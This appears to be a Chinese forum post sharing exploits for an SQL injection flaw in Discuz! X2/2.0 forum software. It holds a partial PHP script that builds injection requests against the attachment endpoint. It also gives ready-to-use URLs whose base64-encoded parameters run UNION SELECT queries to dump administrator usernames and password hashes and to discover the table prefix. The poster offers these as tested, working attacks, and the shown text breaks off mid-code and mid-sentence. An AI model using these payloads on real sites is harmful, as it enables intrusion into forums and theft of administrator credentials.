dz x2 注入点构造 exp

    By:anlfi Exp: <?php global $tmp_expstr, $id; $id=$_GET['id']; //$_GET['$tmp_expstr']; //$id=str_replace(" ","%20",$id); //$id=str_replace("=","%3D",$id); $tmp_expstr = $id; //$tmp_expstr ="'"; //$id = $tmp_expstr;   function getData($host,$path,$expdata,$data){ global $host, $path, $tmp_expstr; $host = "www.xxx.com";   $expdata = "/forum/forum.php?mod=attachment&findpost=ss&aid=".urlencode(urlencode(base64_encode($tmp_expstr))); $data  = "GET $expdata HTTP/1.1\r\n"; $data .= "Host: $host\r\n"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "Content-Length: ".strlen($expdata)."\r\n"; $data .= "Connection: Close\r\n\r\n"; $data .= $expdata; $fp =

【Exp】DZ 2.0 直接暴管理账号密码

DZ 2.0 直接暴管理账号密码 http://XXXXXXXX/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGlrZSAnYWRtaW58eHx5%3D 假如利用不成功说明不是默认前缀 可以用 http://XXXXXXXX/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D 暴前缀 不过一般都没人改 密码破不了。我只是发exp 的 反正我测试成功、、、、、、只